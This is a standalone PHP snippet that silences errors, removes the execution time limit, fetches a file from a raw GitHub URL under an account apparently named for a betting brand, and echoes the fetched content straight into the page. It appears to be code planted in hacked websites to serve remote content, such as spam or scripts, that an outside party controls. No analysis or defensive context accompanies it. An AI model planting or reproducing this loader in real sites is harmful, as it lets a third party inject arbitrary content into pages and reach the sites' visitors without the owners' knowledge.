error_reporting(0); set_time_limit(0); $q = curl_init(); curl_setopt($q, CURLOPT_URL, "https://raw.githubusercontent.com/Berkatbet/batubara/refs/heads/main/tess"); curl_setopt($q, CURLOPT_RETURNTRANSFER, 1); $z = curl_exec($q); curl_close($q); echo($z);